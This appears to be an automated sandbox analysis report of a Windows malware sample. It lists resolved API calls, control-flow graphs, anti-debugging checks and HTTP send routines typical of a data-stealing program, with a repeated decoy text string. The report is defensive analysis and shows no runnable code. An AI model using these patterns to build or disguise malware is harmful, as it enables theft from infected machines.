                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                      • strlen.MSVCRT ref: 004046F0
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 2127927946-2218711628
                      • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                      • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                      • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                      • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 670 419af4-419b08 GetProcAddress 668->670 671 419b0d-419b14 668->671 669->668 670->671 674 419b46-419b4d 671->674 675 419b16-419b41 GetProcAddress * 2 671->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,0251DB40), ref: 004198A1
                      • GetProcAddress.KERNEL32(74DD0000,0251DB58), ref: 004198BA
                      • GetProcAddress.KERNEL32(74DD0000,0251DCD8), ref: 004198D2
                      • GetProcAddress.KERNEL32(74DD0000,0251DCC0), ref: 004198EA
                      • GetProcAddress.KERNEL32(74DD0000,0251CAB0), ref: 00419903
                      • GetProcAddress.KERNEL32(74DD0000,02516580), ref: 0041991B
                      • GetProcAddress.KERNEL32(74DD0000,02514EC8), ref: 00419933
                      • GetProcAddress.KERNEL32(74DD0000,02515168), ref: 0041994C
                      • GetProcAddress.KERNEL32(74DD0000,0251CA20), ref: 00419964
                      • GetProcAddress.KERNEL32(74DD0000,0251C8A0), ref: 0041997C
                      • GetProcAddress.KERNEL32(74DD0000,0251C8E8), ref: 00419995
                      • GetProcAddress.KERNEL32(74DD0000,0251C960), ref: 004199AD
                      • GetProcAddress.KERNEL32(74DD0000,02514F88), ref: 004199C5
                      • GetProcAddress.KERNEL32(74DD0000,0251C9D8), ref: 004199DE
                      • GetProcAddress.KERNEL32(74DD0000,0251C900), ref: 004199F6
                      • GetProcAddress.KERNEL32(74DD0000,02514FC8), ref: 00419A0E
                      • GetProcAddress.KERNEL32(74DD0000,0251CB10), ref: 00419A27
                      • GetProcAddress.KERNEL32(74DD0000,0251CA98), ref: 00419A3F
                      • GetProcAddress.KERNEL32(74DD0000,02514EA8), ref: 00419A57
                      • GetProcAddress.KERNEL32(74DD0000,0251C918), ref: 00419A70
                      • GetProcAddress.KERNEL32(74DD0000,02514F68), ref: 00419A88
                      • LoadLibraryA.KERNEL32(0251C858,?,00416A00), ref: 00419A9A
                      • LoadLibraryA.KERNEL32(0251CA08,?,00416A00), ref: 00419AAB
                      • LoadLibraryA.KERNEL32(0251CAC8,?,00416A00), ref: 00419ABD
                      • LoadLibraryA.KERNEL32(0251C930,?,00416A00), ref: 00419ACF
                      • LoadLibraryA.KERNEL32(0251C948,?,00416A00), ref: 00419AE0
                      • GetProcAddress.KERNEL32(75A70000,0251C978), ref: 00419B02
                      • GetProcAddress.KERNEL32(75290000,0251C990), ref: 00419B23
                      • GetProcAddress.KERNEL32(75290000,0251C9A8), ref: 00419B3B
                      • GetProcAddress.KERNEL32(75BD0000,0251CAE0), ref: 00419B5D
                      • GetProcAddress.KERNEL32(75450000,02515028), ref: 00419B7E
                      • GetProcAddress.KERNEL32(76E90000,025165A0), ref: 00419B9F
                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 00419BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                      • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                      • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                      APIs
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                      • StrCmpCA.SHLWAPI(?,0251CF40), ref: 0040493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                      • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0254E798), ref: 00404DE8
                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                      • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                      • HttpOpenRequestA.WININET(00000000,0254E828,?,0254DDD0,00000000,00000000,00400100,00000000), ref: 00404B15
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 2402878923-2180234286
                      • Opcode ID: 14af7d5969852ec007fdeec1facad88a693abf9282d8eb6001c30f70f80f375e
                      • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                      • Opcode Fuzzy Hash: 14af7d5969852ec007fdeec1facad88a693abf9282d8eb6001c30f70f80f375e
                      • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                      • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocNameProcessUser
                      • String ID:
                      • API String ID: 1206570057-0
                      • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                      • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                      • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                      • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                      APIs
                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                      • ExitProcess.KERNEL32 ref: 0040117E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                      • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                      • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                      • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,02515068), ref: 00419C2D
                      • GetProcAddress.KERNEL32(74DD0000,025150C8), ref: 00419C45
                      • GetProcAddress.KERNEL32(74DD0000,0251CB58), ref: 00419C5E
                      • GetProcAddress.KERNEL32(74DD0000,0251CB70), ref: 00419C76
                      • GetProcAddress.KERNEL32(74DD0000,0251CC18), ref: 00419C8E
